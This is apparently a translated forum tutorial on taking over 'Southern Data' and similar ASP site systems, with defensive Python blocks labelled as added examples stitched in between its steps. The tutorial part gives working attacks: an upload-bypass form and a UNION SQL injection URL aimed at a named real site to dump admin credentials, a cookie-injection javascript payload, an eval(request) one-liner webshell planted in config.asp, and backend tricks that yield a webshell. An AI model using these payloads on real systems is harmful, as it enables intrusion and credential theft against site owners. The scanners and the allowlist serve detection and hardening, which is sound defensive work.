Summary of getting a shell on Southern Data

Source: Internet
Author: User

1. Use the upfile_other.asp vulnerability to obtain a shell directly

You can open userreg.asp directly to register a member and log on as that user. The upload form code is as follows:

<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>
BODY {
  FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
  BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp" method=post encType=multipart/form-data>
<INPUT class=tx1 type=file size=30 name=FileName>
<INPUT class=tx1 type=file size=30 name=FileName1>
<INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=upload name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID>
</FORM></BODY></HTML>

Save the above code as an .html file, replace the URL in the code, select an image file in the first box, and in the second box select the .cer, .asa or .asp file to upload (a trailing space must follow the file name. It seems that in IE8 a space cannot be appended: when a space is added, the Select File dialog box pops up again. I cannot find a solution.)

Note: this method works instantly against Southern Data, Liangjing and Netsoft systems.

2. Dumping the administrator account password by injection ("instant kill"); submit the following:

http://www.huobaodidai.cn/NewsType.asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20=

The above URL directly exposes the administrator account and password. The method of getting a shell from there is as follows:

Write "%><%eval(request(chr(35)))%><%" into the website configuration.

Shell written to http://www.target.com/inc/config.asp successfully.

Here the password, chr(35), is "#".

3. Cookie injection

Clear the address bar, use a union statement for the injection, and submit:

javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

If you are an expert you can do it manually; I don't know how anyway, so why not use the Hedgehog cookie injection conversion tool to do it quickly?

Note: it seems that systems such as Southern Data, Liangjing and Netsoft World also have the same cookie injection.
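The two injection techniques in sections 2 and 3 leave the same trace in the web server log: a UNION SELECT reading the admin table, once in the query string and once inside a cookie. The following detection script is an added example (it is not part of the original article and not code from any of the systems named); it assumes an IIS W3C extended log with the cs-uri-query and cs(Cookie) fields enabled, and the four log lines it scans are constructed for the example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed IIS W3C extended log excerpt (not taken from the page). The second
# and third requests mirror the two techniques above: a UNION SELECT in the
# query string, and the same statement carried in the "id" cookie.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs(Cookie) sc-status
2009-03-01 10:00:01 GET /NewsType.asp SmallClass=5 ASPSESSIONIDQQ=AAAA 200
2009-03-01 10:00:07 GET /NewsType.asp SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin - 200
2009-03-01 10:00:12 GET /shownews.asp - id=1%20and%201%3D2%20union%20select%201,username,password,4,5,6,7,8,9,10%20from%20Admin;+ASPSESSIONIDQQ=AAAA 200
2009-03-01 10:00:20 GET /index.asp - id=12;+ASPSESSIONIDQQ=AAAA 200
"""

PATTERNS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "boolean-tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I),
    "admin-table-read": re.compile(r"\bfrom\s+admin\b", re.I),
}

# Fields whose contents reach SQL in the vulnerable pages: the query string
# (NewsType.asp?SmallClass=) and the cookie (classic ASP Request("id") falls
# back to Cookies when "id" is absent from QueryString and Form).
WATCHED_FIELDS = ("cs-uri-query", "cs(Cookie)")

def decode(value: str) -> str:
    """Undo the URL encoding, with one extra pass for double encoding,
    and collapse whitespace so the regexes see plain SQL."""
    decoded = unquote(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)

def classify(value: str) -> list:
    """Names of the patterns found in one decoded field value."""
    return [name for name, rx in PATTERNS.items() if rx.search(decode(value))]

def scan_log(text: str) -> list:
    """Return one finding per (line, field) that carries injection markers."""
    fields, findings = None, []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]      # column names come from the header
            continue
        if not raw or raw.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, raw.split()))
        for field in WATCHED_FIELDS:
            reasons = classify(rec.get(field, "-"))
            if reasons:
                findings.append({
                    "time": rec["time"], "stem": rec["cs-uri-stem"],
                    "field": field, "reasons": reasons,
                })
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['stem']} [{f['field']}] {', '.join(f['reasons'])}")
```

The cookie field is the one usually forgotten: most log parsers only look at cs-uri-query, which is exactly why the cookie variant in section 3 works against sites that "cleaned up" the address bar. Decoding before matching matters too, since %20 and + both hide the spaces the regexes key on.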

(Of course, Southern Data does not only have the above three vulnerabilities; it also has several that seem to be rarely used. I have summarized the common vulnerabilities for you.)

III. Summary of methods for getting a shell from the backend

(1) Insert a one-liner into the website configuration in System Management: after entering the backend, click "System Management" on the left, then in "Website Configuration" on the right, add "%><%Eval(Request(chr(112)))%><%" to "Website Name" (or any other field) and click Save Configuration.

Then open the inc/config.asp file and you can see that the one-liner has been written into the configuration file.

Then open the client of a one-liner Trojan, connect to it, and you get a small shell.
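Both the section 2 trick and step (1) above end with the same artefact: a script-block delimiter and an eval(request(...)) call sitting inside a string value in inc/config.asp. The scanner below is an added example for defenders, not code from the article or from Southern Data; it assumes the file is a list of Const lines like the ones shown (the SiteName and SiteUrl names are assumptions, UpFileType is the name the page itself uses), and the sample file content is constructed. The second function is the server-side check the backend's Save Configuration step is missing.

```python
import re

# Constructed inc/config.asp in the style the page describes (not the real file):
# the "Website Name" value saved from the backend form, with the one-liner appended.
SAMPLE_CONFIG = '''<%
Const SiteName = "Example Shop%><%eval(request(chr(35)))%><%"
Const UpFileType = "gif|jpg|png|cer"
Const SiteUrl = "http://www.example.invalid/"
%>'''

# Script-block delimiters never belong inside a saved configuration string.
ASP_TAG_RE = re.compile(r"<%|%>")
# eval/execute over Request input is the one-liner signature, however it is spaced.
ONE_LINER_RE = re.compile(r"\b(?:eval|execute|executeglobal)\s*\(\s*request\b", re.I)
# Extensions the page shows the server handing to a script engine.
EXECUTABLE_EXTENSIONS = {"asp", "asa", "aspx", "cer", "cdx", "htr"}
CONST_LINE_RE = re.compile(r'\s*Const\s+(\w+)\s*=\s*"(.*)"\s*$')

def scan_config(text: str) -> list:
    """Return (line number, description) for every suspicious line in the file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if ONE_LINER_RE.search(line):
            findings.append((lineno, "eval/execute on Request input"))
        m = CONST_LINE_RE.match(line)
        if not m:
            continue
        name, value = m.groups()
        if ASP_TAG_RE.search(value):
            findings.append((lineno, f"ASP delimiter inside value of {name}"))
        if name == "UpFileType":
            # The allowed-upload list is itself attacker-editable from the backend
            # (see (2) below), so an executable extension in it is a finding.
            bad = sorted(set(value.lower().split("|")) & EXECUTABLE_EXTENSIONS)
            if bad:
                findings.append((lineno, "UpFileType allows executable extension(s): " + ",".join(bad)))
    return findings

def sanitize_config_value(value: str) -> str:
    """Server-side check for Save Configuration: refuse anything that could close
    the string literal or open a script block in the file being written."""
    if ASP_TAG_RE.search(value) or '"' in value or "\r" in value or "\n" in value:
        raise ValueError("configuration value contains ASP delimiters, quotes or line breaks")
    return value

if __name__ == "__main__":
    for lineno, what in scan_config(SAMPLE_CONFIG):
        print(f"line {lineno}: {what}")
```

Running scan_config over a known-good copy of config.asp and over the live file on a schedule is a cheap integrity check for this particular backdoor; the real fix is sanitize_config_value (or, better, keeping configuration in a data file rather than in executable ASP at all).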

(Note: the following figures were all tested on other websites. To prevent information leakage I have not captured the website's URL; please forgive me!)

(2) Backend upload vulnerability. Part of the code in the Upfile_Photo.asp file is as follows:

If fileEXT = "asp" or fileEXT = "asa" or fileEXT = "aspx" then
EnableUpload = false
End if
If EnableUpload = false then
Msg = "this file type cannot be uploaded! Only the following file types can be uploaded: "& UpFileType
FoundErr = true
End if

You can see that the program only blocks uploading files of the "asp", "asa" and "aspx" types, so we only need to add a file type that the server can parse, such as "cer", to the allowed upload file types in "Website Configuration".

After submitting the file, the page shows the result. When you upload files with other suffixes such as "htr" or "cdx", the server may not parse the file after it is submitted (if it does, you can only say you are lucky).
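The quoted Upfile_Photo.asp check is a blacklist on whatever string fileEXT holds, so section 1's trailing-space trick, a different letter case, or any extension the server also executes (cer, cdx, htr) all pass it. The comparison below is an added example, not code from the article or from Southern Data: it reproduces the blacklist as quoted, puts an allowlist with filename normalisation beside it, and runs both over constructed sample names. The allowed-extension set and the server-chosen storage name are assumptions about what the product photo upload needs.

```python
import re

# Extensions the photo/product upload actually needs. Anything else is refused,
# so a new executable mapping on the server (cer, cdx, htr ...) changes nothing.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# What the Upfile_Photo.asp fragment quoted above amounts to.
BLACKLIST = {"asp", "asa", "aspx"}

def blacklist_check(filename: str) -> bool:
    """Reproduction of the page's check: True means the upload is accepted.
    The extension is compared as-is, so 'cer', 'ASP' or 'asp ' all slip through."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in BLACKLIST

def normalize_filename(filename: str) -> str:
    """Reduce the client-supplied name to what the filesystem will actually store."""
    name = filename.replace("\\", "/").split("/")[-1]   # drop any path component
    name = name.split("\x00", 1)[0]                      # stop at an embedded NUL
    # NTFS drops trailing spaces and dots, so "shell.asp " is saved as "shell.asp";
    # the check must see the same name the web server will later execute.
    return name.rstrip(" .").lower()

def allowlist_check(filename: str) -> bool:
    name = normalize_filename(filename)
    # One base name, one dot, one extension, plain characters only: this also
    # rejects "a.asp;.jpg" (IIS 6 stops at ';') and "a.asp.jpg" double extensions.
    m = re.fullmatch(r"[a-z0-9_\-]+\.([a-z0-9]+)", name)
    return bool(m) and m.group(1) in ALLOWED_EXTENSIONS

def safe_stored_name(filename: str, server_token: str) -> str:
    """Store under a server-chosen base name; only the (allowed) extension is kept."""
    if not allowlist_check(filename):
        raise ValueError("rejected upload filename: %r" % filename)
    return f"{server_token}.{normalize_filename(filename).rsplit('.', 1)[1]}"

# Constructed sample names covering the bypasses the page describes.
SAMPLES = ["photo.jpg", "shell.cer", "shell.asp ", "shell.ASP", "backup.asa",
           "shell.asp;.jpg", "shell.htr", "shell.cdx", "../shell.jpg"]

def compare(names=SAMPLES) -> dict:
    """Map each name to (blacklist verdict, allowlist verdict); True = accepted."""
    return {n: (blacklist_check(n), allowlist_check(n)) for n in names}

if __name__ == "__main__":
    for name, (old, new) in compare().items():
        print(f"{name!r:20} blacklist={old!s:5} allowlist={new}")
```

Two points carry over to the rest of this section: the allowed-type list must not be editable from the same backend the attacker already holds (the page's "Website Configuration" trick), and the same normalisation applies to any other place the application lets a user choose a stored filename, such as the database backup name.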

(3) Backend backup: upload the ASP shell with a jpg suffix as a product image under "Product Management", then back up the database under "System Management": fill in the upload path in the "current database path" field and enter the name for the backup shell in "backup database name". The system will automatically append .asa after the name.

Click "OK" and it prompts "Database backup succeeded...". However, the actual file name does not contain .asa.

Access the backup address directly to obtain a webshell.

(Although the backend demonstration used Netsoft, the methods for getting a shell from the Southern Data and Liangjing backends are similar.)
